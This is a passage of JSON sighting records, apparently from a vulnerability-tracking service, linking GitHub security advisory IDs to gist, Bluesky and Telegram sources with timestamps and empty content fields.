"creation_timestamp": "2026-08-06T00:31:23.007019Z"}, {"uuid": "b3440c02-b97b-4367-a35a-b2d0945cdde1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9473-5f9j-94wq", "type": "seen", "source": "https://gist.github.com/alon710/71f7a1bcf3053bbd51b0ae56e484d06e", "content": "", "creation_timestamp": "2026-08-06T01:31:21.728607Z"}, {"uuid": "6f595bab-7a1e-4e34-ace6-a679895227c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-279x-mwfv-vcqv", "type": "seen", "source": "https://gist.github.com/alon710/a043326ccca63ec501e83cde63d8a11d", "content": "", "creation_timestamp": "2026-08-06T02:32:30.617580Z"}, {"uuid": "30579348-9d3a-43f7-b310-b17dce5ad5c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-48hr-524c-v5w3", "type": "seen", "source": "https://gist.github.com/alon710/3d7b500e615305ceff4644e15070fc7a", "content": "", "creation_timestamp": "2026-08-06T03:31:34.816597Z"}, {"uuid": "dc2c82b6-86da-4951-aa8d-c472ff1515a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wm8w-6qjm-cv43", "type": "seen", "source": "https://gist.github.com/alon710/a33e8f1d3990c5613ef07342bcfbda1b", "content": "", "creation_timestamp": "2026-08-06T04:31:21.622957Z"}, {"uuid": "638841bd-ce36-4a30-a3de-24eabc4a28b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-596P-6JV8-775V", "type": "seen", "source": "https://gist.github.com/alon710/c7b44a1ea6b80e7066b89d9f2735b13f", "content": "", "creation_timestamp": "2026-08-07T00:33:31.334990Z"}, {"uuid": "ac483a01-39cf-4880-b9fc-f01ff453f93a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RVMM-V933-JGXQ", "type": "seen", "source": "https://gist.github.com/alon710/44b00a029eb5e56bac1f996f02574592", "content": "", "creation_timestamp": "2026-08-07T01:35:03.998833Z"}, {"uuid": "f6f66d37-b44f-411d-9985-fe071c839122", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7HXC-F267-H5Q7", "type": "seen", "source": "https://gist.github.com/alon710/1974365b37727353ce889eba0d08c78c", "content": "", "creation_timestamp": "2026-08-07T02:36:06.139840Z"}, {"uuid": "b533813b-7f9d-486b-91c5-a61aada5e5dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2RP4-X2J7-QMCC", "type": "seen", "source": "https://gist.github.com/alon710/682a13b8146f1f1265d18e0a8b61b57e", "content": "", "creation_timestamp": "2026-08-07T03:33:35.146506Z"}, {"uuid": "edcb9948-20d6-4b5c-ab79-6ade5b5f5f22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hmqg-cxww-wqhq", "type": "seen", "source": "https://gist.github.com/alon710/a294e95161c29ae2353666d3ed774930", "content": "", "creation_timestamp": "2026-08-07T04:31:19.370410Z"}, {"uuid": "d015d571-0883-46ec-8b77-3f80ce6f88a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j4r3-hg7j-8chg", "type": "seen", "source": "https://gist.github.com/alon710/0c61a6195ede2fd8a0ca10d8b63bbf6e", "content": "", "creation_timestamp": "2026-08-07T05:35:28.694197Z"}, {"uuid": "649f66a2-2c4c-4644-bba0-d0e86e9fa228", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8hcv-x26h-mcgp", "type": "seen", "source": "https://gist.github.com/alon710/455dd27ab1381c77c49e252fb102cb9f", "content": "", "creation_timestamp": "2026-08-07T06:34:35.772592Z"}, {"uuid": "f843e982-cb2f-42c4-b090-c7eb2597b1a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hq66-cqwq-w95j", "type": "seen", "source": "https://gist.github.com/alon710/49e34188f9c47f29b61522ee6a9c6906", "content": "", "creation_timestamp": "2026-08-07T07:36:22.925774Z"}, {"uuid": "7d8cacfe-e7fe-4a6d-8ce9-0140f3583b60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W9HM-4M3M-FXMM", "type": "seen", "source": "https://gist.github.com/alon710/49e34188f9c47f29b61522ee6a9c6906", "content": "", "creation_timestamp": "2026-08-07T07:34:12.799996Z"}, {"uuid": "5b7fefd3-0b42-46e6-b347-1e7b736fda0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pmhh-3w7g-xqp8", "type": "seen", "source": "https://gist.github.com/alon710/b4340b7774927252fafb9cfdb5e51a49", "content": "", "creation_timestamp": "2026-08-07T08:33:25.714685Z"}, {"uuid": "9ef6d62f-6035-4f44-b950-9abf514d0232", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P8X7-9VFW-P7VC", "type": "seen", "source": "https://gist.github.com/alon710/839078dc1e6146ea4d82f12eb4312cc5", "content": "", "creation_timestamp": "2026-08-07T09:39:30.015152Z"}, {"uuid": "0b19ae93-a8f2-404e-af17-b1f08f3ef60e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F5WM-88JV-G5HX", "type": "seen", "source": "https://gist.github.com/alon710/44cc8c09d48cc3ab63a2106359ce357f", "content": "", "creation_timestamp": "2026-08-07T10:31:27.105736Z"}, {"uuid": "946019a0-ed86-4a9a-8029-7257a675f6d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RQFM-PW34-R7J6", "type": "published-proof-of-concept", "source": "Telegram/FHR8sTJaHxMdgYZj-FavirPOXM07ovPaeCJ2J24gHjC9VrE", "content": "", "creation_timestamp": "2026-08-07T10:08:45.272786Z"}, {"uuid": "2bbe62da-70dc-4c2e-900a-98d053fc0adf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-265m-7826-wjqm", "type": "seen", "source": "https://gist.github.com/alon710/28df1596668f7d78b0163ad585068607", "content": "", "creation_timestamp": "2026-08-07T11:31:42.096864Z"}, {"uuid": "7a7f93c0-fab2-402a-896d-48ee83afeb7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MJ63-M3RC-8PPR", "type": "seen", "source": "https://gist.github.com/alon710/b81b5b8f072a27c4fa74e05558afb769", "content": "", "creation_timestamp": "2026-08-07T12:34:21.417686Z"}, {"uuid": "bbdcf32b-5207-465f-b2f2-1928a775a5eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MH25-X5HQ-WRQP", "type": "seen", "source": "https://gist.github.com/alon710/09e2e2055df2711d8dcc906978bf0f47", "content": "", "creation_timestamp": "2026-08-07T13:34:35.083753Z"}, {"uuid": "710e5153-b867-44db-9fdd-bd4b2b5ae65b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JFM3-95JQ-Q3RF", "type": "seen", "source": "https://gist.github.com/alon710/083e0c15dfeb9a6ae7deb8244b73b528", "content": "", "creation_timestamp": "2026-08-07T14:32:36.667354Z"}, {"uuid": "138a60f7-51ed-4421-8ffc-c61233e9d71c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wg23-69c2-gjc8", "type": "seen", "source": "https://gist.github.com/alon710/1c07f05a9611684f7f4ae2d0d6c93c3e", "content": "", "creation_timestamp": "2026-08-07T15:31:58.269797Z"}, {"uuid": "c43e0030-00a6-48df-88d4-ffcfaa386e41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WVPP-8HX9-P66J", "type": "seen", "source": "https://gist.github.com/alon710/7b081fe119ed64f00c308eff03c67cc3", "content": "", "creation_timestamp": "2026-08-07T16:40:33.716893Z"}, {"uuid": "ffd78be9-9a72-4647-80a7-dde420c91978", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9rjg-x2p2-h68h", "type": "seen", "source": "https://gist.github.com/alon710/78794a04f6eb67dcf53fb32270be19e1", "content": "", "creation_timestamp": "2026-08-07T17:31:49.786746Z"}, {"uuid": "c35b9436-2dbc-402e-99c8-60b1cfa80bbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mmj4-63m4-r6h5", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3msjag2qwrq25", "content": "", "creation_timestamp": "2026-08-07T18:58:46.407447Z"}, {"uuid": "e22637ca-d516-41e7-ba73-4b29e97c7df8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p9jm-q85p-7mcp", "type": "seen", "source": "https://gist.github.com/alon710/8c320d44f4f97b648e1d03dded62d53e", "content": "", "creation_timestamp": "2026-08-07T18:31:18.135124Z"}, {"uuid": "c1501691-1dc4-43c5-ba06-6cc7e173584c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fwg2-594c-jp42", "type": "seen", "source": "https://gist.github.com/alon710/81b96826f50cad7313904ff9c7c75f2e", "content": "", "creation_timestamp": "2026-08-07T19:36:23.928542Z"}, {"uuid": "8aba56c9-30e3-4384-b503-4955e4f6ee88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fp3f-mc75-235c", "type": "seen", "source": "https://gist.github.com/alon710/51a19d7e4b20307e86a86a2096f8e2e7", "content": "", "creation_timestamp": "2026-08-07T20:34:02.197312Z"}, {"uuid": "4d2b0b50-54c5-4055-b69b-79a5dc1b6118", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5p4m-2wfm-xmqj", "type": "seen", "source": "https://gist.github.com/gomesalexandre/8cd74b41b9830109d823dcb777041502", "content": "", "creation_timestamp": "2026-08-07T22:06:55.848044Z"}, {"uuid": "3c31cfb2-12a3-4e24-bf55-8853ed5ef87d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f23p-vx2j-j53r", "type": "seen", "source": "https://gist.github.com/alon710/6634ad7314d99c5586618c1848016378", "content": "", "creation_timestamp": "2026-08-07T22:31:14.312454Z"}, {"uuid": "068bd1cb-af07-40de-ad6c-b3bb10318bb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-79qm-7rj5-m7r9", "type": "seen", "source": "https://gist.github.com/alon710/5988f40586bcc25ff4d614f1ea49845f", "content": "", "creation_timestamp": "2026-08-07T23:35:49.347162Z"}, {"uuid": "8b3a65e6-a9d3-4f7d-a023-9429ced93d2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mhm7-754m-9p8w", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mwd2n6eobl2w", "content": "", "creation_timestamp": "2026-09-25T05:40:19.948112Z"}, {"uuid": "d80ec386-d6a4-4e1c-9903-52543059cbd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mhm7-754m-9p8w", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mwd2n66rpq2k", "content": "", "creation_timestamp": "2026-09-25T05:40:19.225633Z"}, {"uuid": "afed1bb0-16b2-4f50-bc89-58cbd296d0c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mwd2n5tfgv2c", "content": "", "creation_timestamp": "2026-09-25T05:40:17.791297Z"}, {"uuid": "acb01589-8739-4d1a-99a6-f0f8bc63e56b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mwd2n5nf3l2h", "content": "", "creation_timestamp": "2026-09-25T05:40:16.990477Z"}, {"uuid": "069a71d5-5b94-4c84-9df3-c897e42817f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w67g-5rqw-f597", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mwd2n5gt4i2k", "content": "", "creation_timestamp": "2026-09-25T05:40:16.229646Z"}, {"uuid": "8598ded9-9922-486d-94c1-a53a0ed02ee5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mwd2n5gt4i2k", "content": "", "creation_timestamp": "2026-09-25T05:40:16.198588Z"}, {"uuid": "7aa2ca62-3a44-46d9-883d-b4d58d5fa83c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mwd2n5ayqy2l", "content": "", "creation_timestamp": "2026-09-25T05:40:15.075458Z"}, {"uuid": "f29d4d73-9730-429a-88d9-b21998a742b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mhm7-754m-9p8w", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mwd2n5372l2h", "content": "", "creation_timestamp": "2026-09-25T05:40:14.469668Z"}, {"uuid": "5ef10f41-c853-4261-8c9a-dc4e6ab52a55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mhm7-754m-9p8w", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mwd2n4vfj32h", "content": "", "creation_timestamp": "2026-09-25T05:40:13.472941Z"}, {"uuid": "35c4e5b8-1eda-4177-90de-dccda85a769a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mwd2n4pnzc2a", "content": "", "creation_timestamp": "2026-09-25T05:40:12.667442Z"}, {"uuid": "351c4b58-6e69-4e12-bc60-354ea9c55bc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r7wm-3cxj-wff9", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mwd2n4jvh22a", "content": "", "creation_timestamp": "2026-09-25T05:40:11.996536Z"}, {"uuid": "43ff22d8-0dfb-4f4e-a804-d302526225c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-72hv-8253-57qq", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mwd2n4jvh22a", "content": "", "creation_timestamp": "2026-09-25T05:40:11.973032Z"}, {"uuid": "786049e0-fcd6-4b99-9177-a01a021bbf35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mwd2n46bgi2l", "content": "", "creation_timestamp": "2026-09-25T05:40:10.294490Z"}, {"uuid": "16e83415-233e-40ba-be7f-53f685240868", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mwd2n3yhq32h", "content": "", "creation_timestamp": "2026-09-25T05:40:09.499914Z"}, {"uuid": "dd64c783-929e-4718-8a3e-3d945312858c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mwd2n3spb22a", "content": "", "creation_timestamp": "2026-09-25T05:40:08.858206Z"}, {"uuid": "29b4749f-7fce-49b4-9187-40ef9380bb94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3cj3-hqcr-g934", "type": "seen", "source": "https://gist.github.com/alon710/7d70058d99e8d7099d62683f8d252c62", "content": "", "creation_timestamp": "2026-09-25T05:30:32.000000Z"}, {"uuid": "33f2d4c0-e4fd-4778-8ab9-5fa842ec0735", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mr95-65j8-9mxp", "type": "seen", "source": "https://gist.github.com/alon710/8415d76253b3ac6e1a3724ce264e4569", "content": "", "creation_timestamp": "2026-09-25T04:30:34.000000Z"}, {"uuid": "4cdabe3a-27a3-41cb-8629-960551964fae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4q5v-7g7x-j79w", "type": "seen", "source": "https://gist.github.com/alon710/a4de1914db8651dc41f80ba1f3047b71", "content": "", "creation_timestamp": "2026-09-25T03:30:32.000000Z"}, {"uuid": "c6adef9b-c6a5-4707-b668-5f16c469ffee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r4vp-3vw6-r2x5", "type": "seen", "source": "https://gist.github.com/alon710/a4de1914db8651dc41f80ba1f3047b71", "content": "", "creation_timestamp": "2026-09-25T03:30:32.000000Z"}, {"uuid": "565e1246-484f-4f23-a9e6-302eaa859c44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f4hc-ppw9-4hhw", "type": "seen", "source": "https://gist.github.com/alon710/f5ffdc6bd1b277ad08a23759c40e011f", "content": "", "creation_timestamp": "2026-09-25T02:30:33.000000Z"}, {"uuid": "39595403-c9a9-434e-92f4-f022ca843a5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-632h-h47v-g4x4", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mwcp7lzzrb2f", "content": "", "creation_timestamp": "2026-09-25T02:15:44.375802Z"}, {"uuid": "b2160829-2f06-4db3-a937-3349fe6b5663", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7hp8-65ch-5whp", "type": "seen", "source": "https://bsky.app/profile/daruyanagi.bsky.social/post/3mwcoxd3sra2n", "content": "", "creation_timestamp": "2026-09-25T02:11:05.961378Z"}, {"uuid": "e24ef527-896f-465e-a48f-b3dfca774766", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vq6g-g6c7-5f2j", "type": "seen", "source": "https://gist.github.com/alon710/ba52991aa97f84cbc1e3af1670cfe08e", "content": "", "creation_timestamp": "2026-09-25T01:30:32.000000Z"}, {"uuid": "bb76033c-f8ee-4808-a0c4-60e7d89d8337", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fp7w-m676-w7gc", "type": "seen", "source": "https://gist.github.com/alon710/090d1e653999ad37deef689582d25929", "content": "", "creation_timestamp": "2026-09-25T00:30:29.000000Z"}, {"uuid": "d87de68a-0915-42a9-860a-46d693a1207a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x7qq-23vw-7pfg", "type": "seen", "source": "https://gist.github.com/alon710/9eb459f948ad8f570083b5d465e5962c", "content": "", "creation_timestamp": "2026-09-24T23:30:32.000000Z"}, {"uuid": "787a340d-77ef-4d15-bbbf-2beed2b7b740", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3c93-f73f-qc9h", "type": "seen", "source": "https://gist.github.com/alon710/16f5dd43c99d69c085ca2b85bb1225f7", "content": "", "creation_timestamp": "2026-09-24T22:30:32.000000Z"}, {"uuid": "87ac4beb-822f-49b8-a693-9bcb7ecd6ddf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F55J-VVR9-69XV", "type": "seen", "source": "https://t.me/sysadm_in_up/2554", "content": "", "creation_timestamp": "2026-08-04T00:00:10.478541Z"}, {"uuid": "004dc9b0-c37c-44bb-b857-88b94dfda705", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WFMF-8626-Q3R3", "type": "seen", "source": "https://t.me/sysadm_in_up/2354", "content": "", "creation_timestamp": "2026-08-04T00:00:08.736058Z"}, {"uuid": "8f5d1831-0f15-4e25-b7da-978e974f7fdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g6cj-pr64-35w5", "type": "seen", "source": "https://gist.github.com/alon710/aae79fe7bcf7e7234c2912679ec8c451", "content": "", "creation_timestamp": "2026-08-04T00:32:44.722747Z"}, {"uuid": "80fac0f5-2c18-4237-ac1a-0b174ecade59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W4GV-VW3F-29G3", "type": "seen", "source": "https://t.me/sysadm_in_up/2422", "content": "", "creation_timestamp": "2026-08-04T01:00:05.262837Z"}, {"uuid": "d1949374-7afe-4bdd-93a5-f9f31b1c9a53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v5mv-p594-2x33", "type": "seen", "source": "https://gist.github.com/alon710/aa0d8e0a2033bd155210db761c2f4b38", "content": "", "creation_timestamp": "2026-08-04T01:31:43.625431Z"}, {"uuid": "a2595e8e-6812-4b2d-a4ee-8cc8ac1f992a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f7vp-7xgx-4w4r", "type": "seen", "source": "https://gist.github.com/alon710/4e720b413fb9ae4a89b2607de953bdbe", "content": "", "creation_timestamp": "2026-08-04T02:31:57.834460Z"}, {"uuid": "45478e2e-259c-435a-bce4-e987a746f233", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MJ4W-6495-6CRX", "type": "seen", "source": "https://t.me/sysadm_in_up/1639", "content": "", "creation_timestamp": "2026-08-04T03:00:05.484084Z"}, {"uuid": "5c2bfc64-3300-4b0d-957f-28212a2e4beb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7JXR-CG7F-GPGV", "type": "published-proof-of-concept", "source": "https://t.me/sysadm_in_up/1645", "content": "", "creation_timestamp": "2026-08-04T03:00:05.461768Z"}, {"uuid": "67d0e898-2bfc-4bbf-91a9-ea0f88021d8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mfx4-hv73-q22v", "type": "seen", "source": "https://gist.github.com/alon710/b3523524be79c42fa548f91ed3953ea3", "content": "", "creation_timestamp": "2026-08-04T03:31:26.671709Z"}, {"uuid": "f0ff1286-a77e-4b81-8641-15ef28513cbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mq44-7p77-q5h7", "type": "seen", "source": "https://gist.github.com/alon710/8b85a9db45c3273615bc588dcd240ceb", "content": "", "creation_timestamp": "2026-08-04T04:31:10.001582Z"}, {"uuid": "4b126b63-edf9-46f6-ac24-3f92465244fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M42G-XG4C-5F3H", "type": "published-proof-of-concept", "source": "https://t.me/shmelovod/934", "content": "", "creation_timestamp": "2026-08-04T05:00:04.501832Z"}, {"uuid": "8910de7c-5842-4317-ad72-33da3ee1f559", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v8fg-2rw7-q452", "type": "seen", "source": "https://gist.github.com/alon710/d6efe0abb614ef8ea563c1fdaaf1246b", "content": "", "creation_timestamp": "2026-08-04T05:31:41.674268Z"}, {"uuid": "b6c789aa-ffd1-4907-a256-b1dacdfdacca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "RHSA-2020:0630", "type": "seen", "source": 